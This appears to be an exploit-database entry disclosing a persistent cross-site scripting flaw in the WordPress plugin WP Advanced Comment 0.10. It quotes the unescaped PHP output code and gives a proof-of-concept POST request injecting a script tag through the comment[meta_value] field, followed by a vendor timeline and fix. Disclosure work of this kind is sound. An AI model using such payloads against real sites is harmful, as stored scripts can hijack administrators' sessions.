Search...

WordPress Plugin WP Advanced Comment 0.10 - Persistent Cross-Site Scripting

2016-03-10T00:00:00

ID EXPLOITPACK:CB7940A73BD34986EA2F0708FA1ACF1C
Type exploitpack
Reporter Mohammad Khaleghi
Modified 2016-03-10T00:00:00

Description

WordPress Plugin WP Advanced Comment 0.10 - Persistent Cross-Site Scripting

                                        
                                            1. Introduction


# Exploit Title: WordPress WP Advanced Comment 0.10 Persistent XSS 
# Date: Mar.09.2016 
# Exploit Author: Mohammad Khaleghi 
# Contact: https://twitter.com/_blackmatrix 
# Vendor: Ravi Shakya 
# Tested On: Apache2.2 / PHP5 / Kali 64 / WordPress 4.4.1 
# Category: Webapps 
# Software Link: https://wordpress.org/support/plugin/wp-advance-comment 



2. Description

WP Advanced Comment 0.10 plugin does not have XSS protection, which means that an attacker can change the POST request , value of " name="comment[meta_value]" " parameter , it's not escaped . XSS is visible for admin

File : wp-content\plugins\wp-advance-comment\shortcodes\comment-form.php


&lt;!-- Show Comments --&gt;

&lt;?php

	if( $option[$id]['other']['comment_position'] == 1 ){

		echo $this-&gt;show_like_dislike_button( $value['comment_ID'] , 
		$option[$id]['other'] , 'top' );

		echo '&lt;p&gt;'.$value['comment_content'].'&lt;/p&gt;';

		echo $this-&gt;show_like_dislike_button( $value['comment_ID'] , 
		$option[$id]['other'] , 'bottom' );

}?&gt;

&lt;!-- Get the comment meta --&gt; 	

&lt;?php

	$data = get_option( 'wpad_comment_form' );

	if( !empty( $data[$id] ) ): 
?&gt;

&lt;div class="wpad_comment_meta"&gt;
	 &lt;ul&gt;
	  &lt;?php
	  foreach( $data[$id] as $key =&gt; $value1 ){
	  $show_admin = isset($value1['show_admin']) ? 
	  $value1['show_admin'] : 0; $privelage = $this-&gt;check_administrator( $show_admin );
 
     	  if ( !empty( $value1['meta_key'] ) && is_numeric( $key ) && $value1['meta_key'] != 'user_name' && $value1
 	       ['meta_key'] != 'user_email' && $value1['custom_field'] != 'user_image' && 
	       $value1['meta_key'] != 'wpad_comment' && $privelage == true )  {

	       $meta_key = $value1['meta_key'];
	       $label = $value1['label'];

	       $meta_value = get_comment_meta( $value['comment_ID'] , 
	       $meta_key , true ); if( !empty( $meta_value ) ) {

		if( $value1['custom_field'] == 'radio' ) {

			$radio_value = $this-&gt;get_corresponding_metakey( $value1 , $meta_value , 'radio' ); 
			$this-&gt;display_comment_metas_frontend( $label , $radio_value );
			} 
			elseif ( $value1['custom_field'] == 'checkbox' ) {

			   $check_value = $this-&gt;get_corresponding_metakey( $value1 , $meta_value , 'checkbox');	
			   $this-&gt;display_comment_metas_frontend( $label , $check_value ); } 
			else {
   			    $this-&gt;display_comment_metas_frontend( $label , $meta_value );
		  	       }

			}
		}
	}

	?&gt;
	&lt;/ul&gt;
            &lt;/div&gt;

&lt;?php endif; ?&gt;

&lt;!-- Show Comments --&gt;
 

3. Proof of Concept

Request :
__________________________________________________________________________

Host=127.0.0.1:8080
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept=*/*
X-Requested-With=XMLHttpRequest
Referer=http://127.0.0.1:8080/wordpress/2016/02/02/hello-world/
Content-Length=1399
Content-Type=multipart/form-data;
boundary=---------------------------23741051518289624461916684164

Cookie=wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C5a52d446b3c1782856a5021a38e5b1431297eca6fa81946694ebfdf305 994a84; wordpress_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7Cfeedc6beb6fc4d7fc7719fd1e45666b270f598a8294df146742750fd43 2ca5b3; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C80f4e9b382b8b316ba8967a1651ea91cecc45300c13c754f528a17ade8 475032; wp-settings-time-1=1454782581; wp-settings-time-2=1454752438; wordpress_logged_in_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7C8ff14befe34a2a5f1c4c6d93123e6afce4af2c43272a0351f2ce9b1499 1c180f; wordpress_test_cookie=WP+Cookie+check

Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache

POSTDATA =-----------------------------23741051518289624461916684164

Content-Disposition: form-data; name="action"

wpad_save_comment

-----------------------------

23741051518289624461916684164 Content-Disposition: form-data; name="post_id"
 

1

-----------------------------

23741051518289624461916684164 Content-Disposition: form-data; name="form_id"

417

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="email_me_on_approve"

undefined

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="user_name[meta_value]"

bourne

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="user_name[meta_key]"

user_name

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="user_email[meta_value]"

jason_bourne110@yahoo.com

-----------------------------

23741051518289624461916684164 Content-Disposition: form-data; name="user_email[meta_key]"

user_email

-----------------------------

23741051518289624461916684164 Content-Disposition: form-data; name="comment[meta_value]"

Hack &lt;script&gt;alert("Hacked")&lt;/script&gt;

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="comment[meta_key]"

comment

-----------------------------
23741051518289624461916684164--
 

Response
______________________________________________________________________

Status=OK - 200
Date=Sat, 06 Feb 2016 18:18:43 GMT 
Server=Apache X-Frame-Options=SAMEORIGIN, SAMEORIGIN X-Powered-By=PHP/5.5.29 X-Robots-Tag=noindex x-content-type-options=nosniff Expires=Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control=no-cache, must-revalidate, max-age=0 Pragma=no-cache
Content-Length=7 
Keep-Alive=timeout=5, max=100 
Connection=Keep-Alive 
Content-Type=text/html; charset=UTF-8



4. Report Timeline

09-03-2016 : Discovered
09-03-2016 : Vendor notified
09-03-2016 : Vendor Responded 
09-03-2016 : Vendor fixed the problem


5. Solution

Update to version 0.11

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:05:17", "references": [], "description": "\nWordPress Plugin WP Advanced Comment 0.10 - Persistent Cross-Site Scripting", "edition": 1, "reporter": "Mohammad Khaleghi", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2016-03-10T00:00:00", "title": "WordPress Plugin WP Advanced Comment 0.10 - Persistent Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:05:17", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2020-04-01T19:05:17", "rev": 2}, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-03-10T00:00:00", "id": "EXPLOITPACK:CB7940A73BD34986EA2F0708FA1ACF1C", "href": "", "viewCount": 1, "sourceData": "1. Introduction\n\n\n# Exploit Title: WordPress WP Advanced Comment 0.10 Persistent XSS \n# Date: Mar.09.2016 \n# Exploit Author: Mohammad Khaleghi \n# Contact: https://twitter.com/_blackmatrix \n# Vendor: Ravi Shakya \n# Tested On: Apache2.2 / PHP5 / Kali 64 / WordPress 4.4.1 \n# Category: Webapps \n# Software Link: https://wordpress.org/support/plugin/wp-advance-comment \n\n\n\n2. Description\n\nWP Advanced Comment 0.10 plugin does not have XSS protection, which means that an attacker can change the POST request , value of \" name=\"comment[meta_value]\" \" parameter , it's not escaped . XSS is visible for admin\n\nFile : wp-content\\plugins\\wp-advance-comment\\shortcodes\\comment-form.php\n\n\n\n\n<?php\n\n\tif( $option[$id]['other']['comment_position'] == 1 ){\n\n\t\techo $this->show_like_dislike_button( $value['comment_ID'] , \n\t\t$option[$id]['other'] , 'top' );\n\n\t\techo '<p>'.$value['comment_content'].'</p>';\n\n\t\techo $this->show_like_dislike_button( $value['comment_ID'] , \n\t\t$option[$id]['other'] , 'bottom' );\n\n}?>\n\n \t\n\n<?php\n\n\t$data = get_option( 'wpad_comment_form' );\n\n\tif( !empty( $data[$id] ) ): \n?>\n\n<div class=\"wpad_comment_meta\">\n\t <ul>\n\t <?php\n\t foreach( $data[$id] as $key => $value1 ){\n\t $show_admin = isset($value1['show_admin']) ? \n\t $value1['show_admin'] : 0; $privelage = $this->check_administrator( $show_admin );\n \n \t if ( !empty( $value1['meta_key'] ) && is_numeric( $key ) && $value1['meta_key'] != 'user_name' && $value1\n \t ['meta_key'] != 'user_email' && $value1['custom_field'] != 'user_image' && \n\t $value1['meta_key'] != 'wpad_comment' && $privelage == true ) {\n\n\t $meta_key = $value1['meta_key'];\n\t $label = $value1['label'];\n\n\t $meta_value = get_comment_meta( $value['comment_ID'] , \n\t $meta_key , true ); if( !empty( $meta_value ) ) {\n\n\t\tif( $value1['custom_field'] == 'radio' ) {\n\n\t\t\t$radio_value = $this->get_corresponding_metakey( $value1 , $meta_value , 'radio' ); \n\t\t\t$this->display_comment_metas_frontend( $label , $radio_value );\n\t\t\t} \n\t\t\telseif ( $value1['custom_field'] == 'checkbox' ) {\n\n\t\t\t $check_value = $this->get_corresponding_metakey( $value1 , $meta_value , 'checkbox');\t\n\t\t\t $this->display_comment_metas_frontend( $label , $check_value ); } \n\t\t\telse {\n \t\t\t $this->display_comment_metas_frontend( $label , $meta_value );\n\t\t \t }\n\n\t\t\t}\n\t\t}\n\t}\n\n\t?>\n\t</ul>\n </div>\n\n<?php endif; ?>\n\n\n \n\n3. Proof of Concept\n\nRequest :\n__________________________________________________________________________\n\nHost=127.0.0.1:8080\nUser-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept=*/*\nX-Requested-With=XMLHttpRequest\nReferer=http://127.0.0.1:8080/wordpress/2016/02/02/hello-world/\nContent-Length=1399\nContent-Type=multipart/form-data;\nboundary=---------------------------23741051518289624461916684164\n\nCookie=wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C5a52d446b3c1782856a5021a38e5b1431297eca6fa81946694ebfdf305 994a84; wordpress_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7Cfeedc6beb6fc4d7fc7719fd1e45666b270f598a8294df146742750fd43 2ca5b3; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C80f4e9b382b8b316ba8967a1651ea91cecc45300c13c754f528a17ade8 475032; wp-settings-time-1=1454782581; wp-settings-time-2=1454752438; wordpress_logged_in_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7C8ff14befe34a2a5f1c4c6d93123e6afce4af2c43272a0351f2ce9b1499 1c180f; wordpress_test_cookie=WP+Cookie+check\n\nConnection=keep-alive\nPragma=no-cache\nCache-Control=no-cache\n\nPOSTDATA =-----------------------------23741051518289624461916684164\n\nContent-Disposition: form-data; name=\"action\"\n\nwpad_save_comment\n\n-----------------------------\n\n23741051518289624461916684164 Content-Disposition: form-data; name=\"post_id\"\n \n\n1\n\n-----------------------------\n\n23741051518289624461916684164 Content-Disposition: form-data; name=\"form_id\"\n\n417\n\n-----------------------------\n23741051518289624461916684164 Content-Disposition: form-data; name=\"email_me_on_approve\"\n\nundefined\n\n-----------------------------\n23741051518289624461916684164 Content-Disposition: form-data; name=\"user_name[meta_value]\"\n\nbourne\n\n-----------------------------\n23741051518289624461916684164 Content-Disposition: form-data; name=\"user_name[meta_key]\"\n\nuser_name\n\n-----------------------------\n23741051518289624461916684164 Content-Disposition: form-data; name=\"user_email[meta_value]\"\n\njason_bourne110@yahoo.com\n\n-----------------------------\n\n23741051518289624461916684164 Content-Disposition: form-data; name=\"user_email[meta_key]\"\n\nuser_email\n\n-----------------------------\n\n23741051518289624461916684164 Content-Disposition: form-data; name=\"comment[meta_value]\"\n\nHack <script>alert(\"Hacked\")</script>\n\n-----------------------------\n23741051518289624461916684164 Content-Disposition: form-data; name=\"comment[meta_key]\"\n\ncomment\n\n-----------------------------\n23741051518289624461916684164--\n \n\nResponse\n______________________________________________________________________\n\nStatus=OK - 200\nDate=Sat, 06 Feb 2016 18:18:43 GMT \nServer=Apache X-Frame-Options=SAMEORIGIN, SAMEORIGIN X-Powered-By=PHP/5.5.29 X-Robots-Tag=noindex x-content-type-options=nosniff Expires=Wed, 11 Jan 1984 05:00:00 GMT\nCache-Control=no-cache, must-revalidate, max-age=0 Pragma=no-cache\nContent-Length=7 \nKeep-Alive=timeout=5, max=100 \nConnection=Keep-Alive \nContent-Type=text/html; charset=UTF-8\n\n\n\n4. Report Timeline\n\n09-03-2016 : Discovered\n09-03-2016 : Vendor notified\n09-03-2016 : Vendor Responded \n09-03-2016 : Vendor fixed the problem\n\n\n5. Solution\n\nUpdate to version 0.11", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}